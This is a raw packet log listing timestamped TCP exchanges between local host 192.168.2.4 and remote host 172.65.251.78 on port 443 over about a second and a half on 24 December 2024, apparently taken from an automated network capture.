                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.580708027 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.580847025 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.580847025 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.591984034 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.592006922 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.592047930 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.592052937 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.592214108 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.592214108 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605161905 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605185986 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605247021 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605252028 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605276108 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.605298042 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614645958 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614679098 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614739895 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614744902 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614937067 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.614937067 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728102922 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728153944 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728188992 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728195906 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728220940 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.728240013 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738682032 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738703966 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738744020 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738748074 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738768101 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.738799095 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750005007 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750025988 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750066042 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750070095 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750093937 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.750119925 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761353016 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761374950 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761416912 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761421919 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761439085 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.761462927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772694111 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772716999 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772746086 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772749901 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772772074 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.772802114 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.783998966 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.784020901 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.784060001 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.784065008 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.784089088 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.784101963 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795296907 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795326948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795352936 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795357943 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795383930 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.795394897 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806607962 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806629896 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806670904 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806674957 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806694031 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.806716919 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.816088915 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.816123009 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.816153049 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.816155910 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.816167116 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.862509966 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925693989 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925704956 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925730944 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925770044 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925775051 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.925812006 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.936608076 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.936633110 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.936685085 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.936690092 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.936856031 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.947904110 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.947928905 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.947982073 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.947987080 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.948039055 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.953550100 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.953636885 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.953640938 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.953687906 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.964920998 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.964942932 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.965019941 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.965024948 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.965193987 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978060007 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978084087 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978127003 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978130102 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978157997 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.978180885 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987531900 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987571955 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987606049 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987611055 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987637043 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.987658024 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.995059013 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.995146990 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.995151997 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.998850107 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.998915911 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:20.998922110 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.049936056 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112536907 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112548113 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112584114 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112615108 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112726927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112726927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112741947 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.112782955 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.117240906 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.117252111 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.117305994 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.117311001 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.130537987 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.130558014 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.130717039 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.130717039 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.130723000 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139899969 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139919996 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139947891 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139954090 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139964104 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139976025 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.139997005 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.153125048 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.153148890 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.153187037 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.153196096 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.153209925 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.164586067 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.164611101 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.164648056 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.164654016 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.164813042 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.173945904 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.173964977 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.174015999 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.174021959 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.174042940 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.187274933 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.187361956 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.187387943 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.187422037 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.187556028 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.198472023 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.198513985 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.198551893 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.198568106 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.198591948 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.252932072 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310156107 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310188055 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310204983 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310327053 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310347080 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310347080 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310369015 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310389996 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310396910 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310398102 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.310439110 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321069956 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321090937 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321127892 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321166039 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321170092 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321191072 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321208954 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321218967 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.321252108 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334067106 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334132910 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334136009 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334152937 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334182024 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.334203959 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.346963882 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.347012043 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.347035885 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.347043991 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.347069979 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.347089052 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358340979 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358386993 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358402014 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358407974 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358433008 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.358454943 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369714022 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369757891 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369780064 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369786024 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369813919 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.369826078 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381025076 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381067991 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381094933 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381108046 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381136894 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.381162882 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392395020 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392437935 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392452002 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392461061 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392492056 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.392513990 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502376080 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502424002 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502557039 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502557039 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502588987 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.502636909 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513380051 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513449907 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513477087 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513484001 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513639927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.513639927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529531956 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529580116 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529721022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529721022 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529730082 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.529779911 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537846088 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537890911 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537923098 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537929058 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537952900 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.537975073 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547846079 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547893047 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547924042 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547930956 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547947884 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.547970057 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561212063 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561259985 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561322927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561322927 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561330080 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.561372995 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571784019 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571830034 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571861029 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571866989 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571894884 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.571903944 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583201885 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583242893 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583275080 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583281994 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583439112 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.583439112 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.945030928 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.945089102 CET44349731172.65.251.78192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.945120096 CET49731443192.168.2.4172.65.251.78
                                                                                                                                                                                                                              Dec 24, 2024 07:31:21.945139885 CET44349731172.65.251.78192.168.2.4
